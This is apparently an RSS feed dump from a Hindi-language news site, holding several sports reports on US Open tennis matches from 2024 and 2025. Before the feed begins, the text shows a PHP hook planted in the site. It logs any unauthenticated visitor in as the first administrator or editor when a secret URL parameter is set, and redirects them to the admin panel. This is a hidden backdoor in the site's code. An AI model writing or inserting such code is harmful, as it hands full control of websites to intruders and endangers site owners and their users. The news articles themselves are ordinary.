// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); US Open – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 05 Sep 2025 08:08:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 US ओपन सेमीफाइनल में भांबरी की हार, लेकिन इनामी राशि से बने मालामाल https://pratyushaashakinayikiran.com/?p=183119 Fri, 05 Sep 2025 08:08:00 +0000 https://pratyushaashakinayikiran.com/?p=183119 न्यूयॉर्क

 यूएस ओपन के मेन्स डब्ल्स सेमीफाइनल में भारत के युकी भांबरी और उनके न्यूजीलैंड साथी माइकल वीनस को ब्रिटिश जोड़ी जो सालिसबरी और नील स्कुप्स्की ने शुक्रवार को हराया. कड़े मुकाबले में सालिसबरी और स्कुप्स्की ने एक सेट से पिछड़ने के बाद वापसी करते हुए 6(2)-7, 7-6(5), 6-4 से जीत दर्ज की और फाइनल में जगह बनाई.  इस जीत के साथ ब्रिटिश जोड़ी ने फ्लशिंग मीडोज में हार्ड कोर्ट ग्रैंड स्लैम इवेंट के फाइनल में जगह बना ली. 

पहले सेट में दोनों टीमें 3-3 की बराबरी पर थीं, इसके बाद भारत और कीवी जोड़ी ने बढ़त बनाई और आखिरकार सेट को टाई-ब्रेक तक ले गई. भांबरी और वीनस ने पहला सेट टाई-ब्रेक जोरदार अंदाज में 7-2 से अपने नाम किया. 

दूसरे सेट में भी भांबरी-वीनस ने शुरुआती बढ़त ली, लेकिन सालिसबरी और स्कुप्स्की ने वापसी कर मैच को एक और टाई-ब्रेक तक पहुंचाया और इस बार ब्रिटिश जोड़ी ने जीत हासिल कर मुकाबले को बराबरी पर ला दिया. 

निर्णायक तीसरा सेट ब्रिटिश जोड़ी के नाम रहा, जिन्होंने 6-4 से जीत दर्ज कर फाइनल में जगह पक्की की. भांबरी और वीनस ने पूरे टूर्नामेंट में शानदार खेल दिखाया. उन्होंने अपने अभियान की शुरुआत मार्कोस गिरोन और लर्नर टिएन को 6-0, 6-3 से हराकर की थी. दूसरे राउंड में भी उनका प्रदर्शन दमदार रहा, जहां उन्होंने गोंजालो एस्कोबार और मिगुएल एंजेल रेयेस-वरेला को 6-1, 7-5 से मात दी. 

भारतीय-कीवी जोड़ी ने इसके बाद राउंड ऑफ 16 में जर्मनी की टीम टिम पुट्ज् और केविन क्राविट्ज को सीधे सेटों में 6-4, 6-4 से हराया.  क्वार्टरफाइनल में उन्होंने मेक्टिक और राम को मात देकर सेमीफाइनल में ब्रिटिश जोड़ी से भिड़ंत तय की थी. 

तो युकी भांबरी को ईनामी राश‍ि में क्या मिलेगा? 
युकी भांबरी और माइकल वीनस को यूएस ओपन पुरुष डबल्स के सेमीफाइनल तक शानदार सफर के लिए 2,50,000 अमेरिकी डॉलर (करीब ₹2.20 करोड़) की इनामी राशि मिली. 

यूएस ओपन डबल्स प्राइज मनी 

    विजेता (Winner): $1,000,000 ≈ करीब ₹8.8 करोड़
    रनर-अप (Runner-Up): $500,000 ≈ करीब ₹4.4 करोड़
    सेमीफाइनलिस्ट (Semifinalists): $250,000 ≈ करीब ₹2.2 करोड़
    क्वार्टरफाइनलिस्ट (Quarterfinalists): $125,000 ≈ करीब ₹1.1 करोड़
    थर्ड राउंड: $75,000 ≈ करीब ₹66 लाख
    सेकंड राउंड: $45,000 ≈ करीब  ₹39.6 लाख
    फर्स्ट राउंड:
$30,000 ≈ करीब ₹26.4 लाख

 

]]>
US Open का ताज सबालेंका के सिर सजा, फाइनल में पेगुला को सीधे सेटों में दी शिकस्त https://pratyushaashakinayikiran.com/?p=67728 Sun, 08 Sep 2024 15:36:00 +0000 https://pratyushaashakinayikiran.com/?p=67728 न्यूयॉर्क
वर्ल्ड नंबर 2 आर्यना सबालेंका ने फाइनल में जेसिका पेगुला को सीधे सेटों में हराकर यूएस ओपन 2024 विमेंस सिंगल का खिताब जीत लिया है. न्यूयॉर्क के आर्थर ऐश स्टेडियम में खेले गए हाई-वोल्टेज फाइनल मुकाबले में बेलारूसी खिलाड़ी ने अपनी अमेरिकी प्रतिद्वंद्वी को 7-5, 7-5 से हराया. यह मुकाबला एक घंटा 53 मिनट तक चला. पिछले साल सबालेंका यूएस ओपन के फाइनल में अमेरिकी खिलाड़ी कोको गॉफ से हार गई थीं, लेकिन इस साल उन्होंने इतिहास को दोहराने नहीं दिया.

पेगुला ने क्वार्टर फाइनल में वर्ल्ड नंबर 1 पोलैंड की इगा स्विटेक को हराया था. सेमीफाइनल मुकाबले में उन्होंने शुरुआती सेट हारने के बावजूद चेक गणराज्य की कैरोलिना मकोवा को हराया और पहली बार किसी ग्रैंड स्लैम टूर्नामेंट के फाइनल में जगह बनायी. खिताबी मुकाबले में जेसिका पेगुला ने आर्यना सबालेंका को कड़ी टक्कर दी, लेकिन सीधे सेटों में उन्हें हार का सामना करना पड़ा और लगातार दो ऑस्ट्रेलियन ओपन जीतने के बाद सबालेंका ने अपना तीसरा बड़ा खिताब जीता.

सबालेंका पर पहले सेट में बढ़त लेने के बाद हारीं पेगुला

पेगुला को इससे बेहतर शुरुआत की उम्मीद नहीं थी क्योंकि पहले सेट में उन्हें सबलेंका पर 2-1 से बढ़त हासिल करने के लिए बहुत जल्दी ब्रेक मिला. उन्होंने अपने गेम की शुरुआत ठीक वहीं से की जहां कैरोलिना मकोवा के खिलाफ सेमीफाइनल में छोड़ा था. लेकिन पेगुला की खुशी ज्यादा देर नहीं रही क्योंकि सबालेंका ने वापसी कर ली. आर्यना सबालेंका ने एक और सर्विस ब्रेक के साथ अपने प्रतिद्वंद्वी पर अधिक दबाव डालना जारी रखा और अंततः 5-2 की बढ़त ले ली.

हालांकि, पेगुला ने सबालेंका को पहले सेट में आसानी से जीत नहीं हासिल करने दी और महत्वपूर्ण समय पर उनकी सर्विस ब्रेक करके पहले स्कोर 5-4 कर दिया और उसके बाद 5-5 से बराबरी पर ला दिया. जब स्कोर लाइन 6-5 थी, तब 26 वर्षीय सबालेंका ने दो सेट पॉइंट गंवा दिए, लेकिन तीसरे सेट पॉइंट को भुनाकर एक घंटे में पहला सेट जीत लिया. उन्होंने पहले सेट में चार डबल्स के साथ 23 अप्रत्याशित गलतियां कीं, लेकिन 25 स्मैशिंग विनर्स ने उन्हें बचा लिया.

दूसरे सेट में 5-3 से पिछड़ने के बावजूद जीतीं सबलेंका

आर्यना सबालेंका दूसरे सेट में कहीं अधिक प्रभावशाली दिखीं और सर्विस ब्रेक के साथ 3-0 की बढ़त ले ली. जेसिका पेगुला ने सर्विस बरकरार रखते हुए सेट में अपना खाता खोला, लेकिन वह वापसी करने और अपने प्रतिद्वंद्वी को दबाव में लाने से काफी दूर थीं. पेगुला किसी भी तरह से हार मानने को तैयार नहीं थीं. उन्होंने सबालेंका की सर्विस एक बार और ब्रेक करने में सफलता पायी और स्कोर लाइन 3-3 पर ला दिया. वह यहीं नहीं रुकीं और एक और सर्विस ब्रेक के साथ सबालेंका पर 5-3 की बढ़त बना ली.

दूसरे सेट में 3-0 की शुरुआत के बाद कमांड में दिख रहीं आर्यना सबालेंका ने अचानक खुद को एक मुश्किल स्थिति में डाल लिया. लेकिन उन्होंने खुद को संयमित करते हुए तुरंत अपने खेल में सुधार किया और पेगुला के खिलाफ निर्णायक वापसी करने में सफल रहीं. उन्होंने दूसरा सेट और मैच भी 7-5 जीत लिया. सबालेंका को 6-5 के स्कोर पर दो चैंपियनशिप पॉइंट मिले, जिनमें से एक पेगुला ने बचा लिया. लेकिन सबालेंका ने दूसरा पॉइंट अपने पक्ष में करके पहली बार यूएस ओपन का खिताब अपने नाम किया.

 

]]>
अमेरिकी ओपन: स्वियातेक को हराकर पेगुला पहली बार ग्रैंडस्लैम सेमीफाइनल में https://pratyushaashakinayikiran.com/?p=66657 Thu, 05 Sep 2024 18:26:00 +0000 https://pratyushaashakinayikiran.com/?p=66657 न्यूयॉर्क
अमेरिका की जेसिका पेगुला ने  यहां दुनिया की नंबर एक खिलाड़ी इगा स्वियातेक को सीधे सेट में हराकर उलटफेर करते हुए अमेरिकी ओपन टेनिस टूर्नामेंट के महिला एकल के सेमीफाइनल में जगह बनाई।

तीस साल की पेगुला ने स्वियातेक को 6-2, 6-4 से हराकर पहली बार किसी ग्रैंडस्लैम टूर्नामेंट के सेमीफाइनल में प्रवेश किया।

इससे पहले छठी वरीय पेगुला को ग्रैंडस्लैम टूर्नामेंट के क्वार्टर फाइनल में छह बार शिकस्त का सामना करना पड़ा था।

अपने पिछले 15 मैच हार्ड कोर्ट पर खेलते हुए 14 जीत दर्ज करने वाली पेगुला ने कहा, ‘‘मैं इतनी बार से हार रही थी। मुझे पता है कि सभी मेरे से इस बारे में पूछते रहते थे लेकिन मेरा जवाब होता था कि मुझे नहीं पता कि मुझे इससे अलग क्या करना है। मुझे बस कोर्ट पर उतरकर मैच जीतना है। इसलिए भगवान का शुक्र है कि मैं ऐसा कर पाई और अंतत: मैं कह सकती हूं कि मैं सेमीफाइनलिस्ट हूं।’’

सेमीफाइनल में बृहस्पतिवार को पेगुला की भिड़ंत चेक गणराज्य की गैरवरीय कैरोलिना मुचोवा से होगी।

फ्रेंच ओपन 2023 के फाइनल में स्वियातेक के खिलाफ हार के साथ उप विजेता रहीं मुचोवा ने 22वीं वरीय बीट्रिज हदाद माइया को 6-1, 6-4 से हराकर लगातार दूसरी बार अमेरिकी ओपन के सेमीफाइनल में जगह बनाई।

पिछले साल अमेरिकी ओपन के सेमीफाइनल में कोको गॉफ के खिलाफ शिकस्त के बाद मुचोवा ने अपनी दाहिनी कलाई का ऑपरेशन कराया था और फिर वह लगभग 10 महीने तक टूर से दूर रही और जून में वापसी की।

बृहस्पतिवार को ही दूसरे सेमीफाइनल में अमेरिका की 13वीं वरीय एम्मा नवारो का सामना दूसरी वरीय एरिना सबालेंका से होगा।

 

]]>
स्वियातेक और पेगुला अमेरिकी ओपन के क्वार्टर फाइनल में https://pratyushaashakinayikiran.com/?p=65654 Tue, 03 Sep 2024 16:26:00 +0000 https://pratyushaashakinayikiran.com/?p=65654 स्वियातेक और पेगुला अमेरिकी ओपन के क्वार्टर फाइनल में

बोपन्ना-सुत्जियादी की मिश्रित जोड़ी ने अमेरिकी ओपन के सेमीफाइनल में प्रवेश किया

बोपन्ना-सुत्जियादी की जोड़ी अमेरिकी ओपन के मिश्रित युगल सेमीफाइनल में

न्यूयॉर्क
दुनिया की नंबर एक खिलाड़ी इगा स्वियातेक और छठी वरीयता प्राप्त जेसिका पेगुला ने सीधे सेटों में जीत दर्ज करके अमेरिकी ओपन टेनिस टूर्नामेंट के महिला एकल के क्वार्टर फाइनल में प्रवेश किया जहां उनका आमना सामना होगा।

पांच बार की ग्रैंड स्लैम विजेता स्वियातेक ने सोमवार की रात को खेले गए मैच में 16वीं वरीयता प्राप्त ल्यूडमिला सैमसोनोवा को 6-4, 6-1 से पराजित किया। यह दोनों खिलाड़ी पहले सेट में एक समय 4-4 से बराबरी पर थी लेकिन इसके बाद स्वियातेक में लगातार सात गेम जीत कर अपनी जीत सुनिश्चित की।

अमेरिकी खिलाड़ी पेगुला ने डायना श्नाइडर पर 6-4, 6-2 से जीत हासिल की। वह सातवीं बार किसी ग्रैंड स्लैम टूर्नामेंट के क्वार्टर फाइनल में पहुंची हैं।

महिला वर्ग में करोलिना मुचोवा भी क्वार्टर फाइनल में पहुंच गई हैं। उन्होंने इस सत्र में फ्रेंच ओपन और विंबलडन में उपविजेता रही जैस्मीन पाओलिनी को 6-3 6-3 से हराया।

मुचोवा का अगला मुकाबला बीट्रिज़ हद्दाद माइया से होगा जिन्होंने 2018 की ऑस्ट्रेलियाई ओपन चैंपियन कैरोलिन वोज्नियाकी को 6-2, 3-6, 6-3 से हराया। वह 1968 में मारिया ब्यूनो के बाद अमेरिकी ओपन के क्वार्टर फाइनल में पहुंचने वाली ब्राजील की पहली महिला खिलाड़ी हैं।

पुरुष वर्ग के मैचों में ब्रिटेन के 25वीं वरीयता प्राप्त जैक ड्रेपर ने गैरवरीयता प्राप्त टॉमस मचाक पर 6-3 6-1 6-2 से जीत दर्ज करके पहली बार किसी ग्रैंड स्लैम टूर्नामेंट के क्वार्टर फाइनल में प्रवेश किया।

उनका अगला मुकाबला 10वीं वरीयता प्राप्त एलेक्स डी मिनौर से होगा जिन्होंने जॉर्डन थॉम्पसन को 6-0 3-6 6-3 7-5 से हराया।

रूस के पांचवीं वरीयता प्राप्त और यहां 2021 के चैंपियन दानिल मेदवेदेव भी अंतिम आठ में जगह बनाने में सफल रहे। उन्होंने नूनो बोर्गेस को 6-0, 6-1, 6-3 से हराया।

बोपन्ना-सुत्जियादी की मिश्रित जोड़ी ने अमेरिकी ओपन के सेमीफाइनल में प्रवेश किया

बोपन्ना-सुत्जियादी की जोड़ी अमेरिकी ओपन के मिश्रित युगल सेमीफाइनल में

 भारत के दिग्गज टेनिस खिलाड़ी रोहन बोपन्ना और इंडोनेशिया की उनकी जोड़ीदार अल्डिला सुत्जियादी ने यहां ऑस्ट्रेलिया के मैथ्यू एबडेन और चेक गणराज्य की बारबोरा क्रेजसिकोवा को एक संघर्षपूर्ण मुकाबले में पराजित करके अमेरिकी ओपन टेनिस टूर्नामेंट के मिश्रित युगल के सेमीफाइनल में प्रवेश किया।

बोपन्ना और सुत्जियादी की आठवीं वरीयता प्राप्त जोड़ी ने सोमवार रात एक घंटे और 33 मिनट तक चले क्वार्टर फाइनल मैच में एबडेन और क्रेजसिकोवा चौथी वरीयता प्राप्त जोड़ी पर 7-6(4) 2-6 10-7 से जीत दर्ज की।

बोपन्ना और सुत्जियादी ने इससे पहले दूसरे दौर के मैच में ऑस्ट्रेलिया के जॉन पीयर्स और चेक गणराज्य की कैटरीना सिनियाकोवा को 0-6, 7-6(5), 10-7 से हराया था।

सेमीफाइनल में बोपन्ना और सुत्जियादी का मुकाबला डोनाल्ड यंग और टेलर टाउनसेंड की अमेरिकी जोड़ी से होगा।

44 वर्षीय बोपन्ना पहले ही पुरुष युगल से बाहर हो गए थे। उनकी और एबडेन की जोड़ी तीसरे दौर में मैक्सिमो गोंजालेज और आंद्रेस मोल्टेनी की अर्जेंटीना की 16वीं वरीय जोड़ी से 1-6, 5-7 से हार गई थी।

 

 

]]>
बोपन्ना-सुत्जियादी की जोड़ी अमेरिकी ओपन के मिश्रित युगल क्वार्टर फाइनल में https://pratyushaashakinayikiran.com/?p=65078 Sun, 01 Sep 2024 20:26:00 +0000 https://pratyushaashakinayikiran.com/?p=65078 न्यूयॉर्क
 भारत के रोहन बोपन्ना और उनकी इंडोनेशियाई जोड़ीदार अल्दिला सुत्जियादी ने पहला सेट गंवाने के बाद शानदार वापसी करके अमेरिकी ओपन टेनिस टूर्नामेंट के मिश्रित युगल के क्वार्टर फाइनल में प्रवेश किया।

बोपन्ना और सुत्जियादी की आठवीं वरीयता प्राप्त जोड़ी ने एक घंटे 13 मिनट तक चले दूसरे दौर के मैच में ऑस्ट्रेलिया के जॉन पीयर्स और चेक गणराज्य की कतेरीना सिनियाकोवा को 0-6, 7-6(5) 10-7 से हराया।

बोपन्ना और सुत्जियादी का अगला मुकाबला मैथ्यू एबडेन और बारबोरा क्रेजिकोवा की चौथी वरीयता प्राप्त जोड़ी से होगा। बोपन्ना और उनके जोड़ीदार ने शुरुआती दौर में जर्मनी के टिम पुएत्ज़ और नीदरलैंड की डेमी शूअर्स पर 7-6(7) 7-6(5) से जीत दर्ज की थी।

बोपन्ना और एब्डेन की जोड़ी पहले ही पुरुष युगल के तीसरे दौर में पहुंच गई थी। उन्होंने दूसरे दौर में स्पेन के रॉबर्टो कारबालेस बेना और अर्जेंटीना के फेडेरिको कोरिया को 6-2, 6-4 से हराया।

यानिक सिनर और इगा स्वियातेक अमेरिकी ओपन के चौथे दौर में

 विश्व के नंबर एक पुरुष खिलाड़ी यानिक सिनर ने क्रिस ओ’कोनेल पर आसान जीत के साथ अमेरिकी ओपन टेनिस टूर्नामेंट के चौथे दौर में प्रवेश किया।

नोवाक जोकोविच और कार्लोस अल्कराज के बाहर होने के बाद सिनर को खिताब का प्रबल दावेदार माना जा रहा है और उन्होंने अपनी ख्याति के अनुरूप प्रदर्शन करते हुए दो घंटे से भी कम समय में ओ’कोनेल पर 6-1, 6-4, 6-2 से जीत हासिल की।

अमेरिकी ओपन में 2021 के चैंपियन दानिल मेदवेदेव भी अगले दौर में पहुंचने में सफल रहे। रूस के इस खिलाड़ी ने फ्लेवियो कोबोली को 6-3, 6-4, 6-3 से हराया। उनका अगला मुकाबला नूनो बोर्जेस से होगा, जिन्होंने जैकब मेन्सिक को 6-7 (5), 6-1, 3-6, 7-6 (6), 6-0 से पराजित किया।

महिला वर्ग में विश्व की नंबर एक खिलाड़ी और यहां 2022 की चैंपियन इगा स्वियातेक ने 25वीं वरीयता प्राप्त अनास्तासिया पाव्लुचेनकोवा को 6-4, 6-2 से हराकर लगातार चौथे वर्ष अमेरिकी ओपन के चौथे दौर में प्रवेश किया।

पांचवीं वरीयता प्राप्त जैस्मीन पाओलिनी को भी यूलिया पुतिनत्सेवा को 6-3, 6-4 से हराने में किसी तरह की परेशानी नहीं हुई। उनका अगला मुकाबला 2023 की फ्रेंच ओपन फाइनलिस्ट कैरोलिना मुचोवा से होगा।

महिला वर्ग में जेसिका पेगुला, ल्यूडमिला सैमसोनोवा, डायना श्नाइडर और 2018 की ऑस्ट्रेलियाई ओपन चैंपियन कैरोलिन वोज्नियाकी भी आगे बढ़ने में सफल रही।

जनवरी में ऑस्ट्रेलियाई ओपन में अपने करियर का पहला खिताब हासिल करने वाले सिनर सोमवार को चौथे दौर में अमेरिका के टॉमी पॉल से भिड़ेंगे। पॉल ने कनाडाई क्वालीफायर गेब्रियल डायलो को 6-7 (5), 6-3, 6-1, 7-6 (3) से हराया।

सिनर ने अपने अगले प्रतिद्वंदी के बारे में कहा,‘‘उसने हाल में अपने खेल में काफी सुधार किया है और वह कड़ी चुनौती पेश करता है। विशेषकर अमेरिका में उसने अच्छा प्रदर्शन किया है। यह कड़ा मैच होगा।’’

अल्कराज को हराने वाले वैन डे ज़ैंडस्चुल्प अपना विजय अभियान आगे नहीं बढ़ा पाए और उन्हें जैक ड्रेपर से 6-3, 6-4, 6-2 से हार का सामना करना पड़ा। ब्रिटेन के 22 वर्षीय खिलाड़ी ड्रेपर कभी भी चौथे दौर से आगे नहीं बढ़ पाए। उनका अगला मुकाबला गैरवरीयता प्राप्त टॉमस मचाक से होगा जिन्होंने डेविड गोफिन पर 6-3, 6-1, 6-2 से जीत हासिल की।

 

 

]]>
यूएस ओपन: जननिक सिनर ने दूसरे दौर में दर्ज की आसान जीत https://pratyushaashakinayikiran.com/?p=64130 Fri, 30 Aug 2024 15:38:00 +0000 https://pratyushaashakinayikiran.com/?p=64130 न्यूयॉर्क

विश्व के नंबर 1 खिलाड़ी जननिक सिनर ने अमेरिकी एलेक्स मिशेलसन को सीधे सेटों में 6-4, 6-0, 6-2 से हराकर यूएस ओपन के पुरुष एकल के तीसरे दौर में प्रवेश किया। इस जीत के साथ, सिनर ने सीजन की अपनी 50वीं जीत और हार्ड कोर्ट पर अपने दौरे की 30वीं जीत दर्ज की।

गुरुवार दोपहर (स्थानीय समयानुसार) आर्थर ऐश स्टेडियम में सिनर ने शानदार प्रदर्शन किया और 49वें स्थान पर रहने वाले नेक्स्टजेन एटीपी स्टार को हराकर एक मुश्किल मुकाबले को आसान जीत में बदल दिया। शीर्ष वरीयता प्राप्त खिलाड़ी ने 2024 में शानदार प्रदर्शन किया है, जिसमें ऑस्ट्रेलियन ओपन में अपने पहले मेजर सहित पांच खिताब जीते हैं।

मैच में 23 वर्षीय इटालियन सिनर ने स्वतंत्र रूप से शॉट लगाए और अपने वजन और शॉट की गहराई से मिशेलसन को गलतियाँ करने पर मजबूर किया, जिससे उन्हें इस महीने 20 वर्षीय खिलाड़ी के खिलाफ दूसरी जीत मिली।

सिनर, जिन्होंने सिनसिनाटी में खिताब के लिए अपने पहले एटीपी हेड-टू-हेड मीटिंग में मिशेलसन को हराया था, लगातार चौथे साल यूएस ओपन में तीसरे दौर में हैं और अब उनका सामना क्रिस्टोफर ओ'कॉनेल से होगा।

सिनर ने जीते गए आठ ब्रेक पॉइंट में से 50 प्रतिशत को कन्वर्ट किया, जबकि मिशेलसन ने केवल दो जीते। सिनर का 81% पहला सर्व जीत प्रतिशत, जो मिशेलसन के 65% से काफी अधिक है, उनकी सफलता का एक महत्वपूर्ण कारक था। युवा अमेरिकी ने पांच डबल फॉल्ट सर्व किए।

इससे पहले, चेक गणराज्य के टॉमस मचैक ने 16वीं वरीयता प्राप्त सेबेस्टियन कोर्डा को 6-4, 6-2, 6-4 से हराकर पहली बार हार्ड-कोर्ट मेजर के तीसरे दौर में प्रवेश किया। इतालवी माटेओ अर्नाल्डी ने भी रोमन सफीउलिन को 6-2, 6-4, 6-4 से हराकर अपने प्रभावशाली वर्ष को जारी रखा।

विश्व के 30वें नंबर के खिलाड़ी अर्नाल्डी का अगला मुकाबला जॉर्डन थॉम्पसन से होगा, जिन्होंने सातवें वरीय ह्यूबर्ट हर्काज़ को 7-6(2), 6-1, 7-5 से हराया। मचैक का मुकाबला डेविड गोफिन या एड्रियन मैनारिनो से होगा।

 

 

 

]]>
यूएस ओपन: दो बार की चैंपियन नाओमी ओसाका दूसरे दौर में हारकर बाहर https://pratyushaashakinayikiran.com/?p=64132 Fri, 30 Aug 2024 15:36:00 +0000 https://pratyushaashakinayikiran.com/?p=64132 न्यूयॉर्क
 दो बार की चैंपियन जापान की नाओमी ओसाका की अमेरिकी ओपन में वापसी गुरुवार को दूसरे दौर में समाप्त हो गई, जब वह 52वीं रैंकिंग की चेक गणराज्य की कैरोलिन मुचोवा से 6-3, 7-6 (7/5) से हार गईं।

2018 और 2020 में विजेता रहीं जापान की ओसाका अपनी बेटी शाई के जन्म के कारण पिछले साल प्रतियोगिता में भाग नहीं ले पाई थीं। 2022 में ऑस्ट्रेलियन ओपन के बाद से वह किसी ग्रैंड स्लैम के तीसरे दौर में आगे नहीं बढ़ पाई हैं।

कोर्ट पर वापसी में ओसाका को अपनी लय हासिल करने के लिए संघर्ष करना पड़ा है, शुरुआती दौर में जेलेना ओस्टापेंको के खिलाफ उनकी जीत चार साल में शीर्ष दस में स्थान पाने वाली किसी महिला पर उनकी पहली जीत दर्ज थी।

दूसरी तरफ मुचोवा पिछले साल न्यूयॉर्क में सेमीफाइनलिस्ट थी और कलाई की सर्जरी के कारण नौ महीने तक बाहर रहने से पहले दुनिया में नौवें स्थान पर थीं।

ओसाका ने आर्थर ऐश स्टेडियम में शानदार वापसी करते हुए अच्छी शुरुआत की, जहाँ 2018 में उन्होंने सेरेना विलियम्स को हराकर पहली ग्रैंड स्लैम जीत दर्ज की थी। इस बार, ओसाका स्पॉटलाइट के लिए डिज़ाइन किए गए काले रंग के कस्टमाइज़्ड नाइकी आउटफिट में कोर्ट पर उतरीं।

उन्होंने अच्छी शुरुआत की, लेकिन वे शुरुआती ब्रेक पॉइंट का फ़ायदा उठाने में विफल रहीं और मुचोवा द्वारा नेट पर लगातार दबाव बनाए रखने के दौरान कई गलतियाँ कीं।

चेक गणराज्य की खिलाड़ी ने लगातार पाँच गेम जीते और शुरुआती सेट में 4-3 की बढ़त हासिल की और अंत में पहला सेट 6-3 से अपने नाम किया।

दूसरे सेट में 1-1 की बराबरी पर कड़ी पकड़ के साथ, ओसाका ने मुचोवा की सर्विस तोड़कर 5-4 की बढ़त हासिल की।

हालांकि, उन्होंने अगले गेम में तीन सेट के मौके गंवाए, जिससे मुचोवा को फिर से बढ़त हासिल करने का मौका मिला। ओसाका ने फिर एक लंबे फोरहैंड के साथ सेट को बराबर कर दिया। इसके बाद मैच टाईब्रेकर में गया, जहां मुचोवा ने बाजी मारी।

 

]]>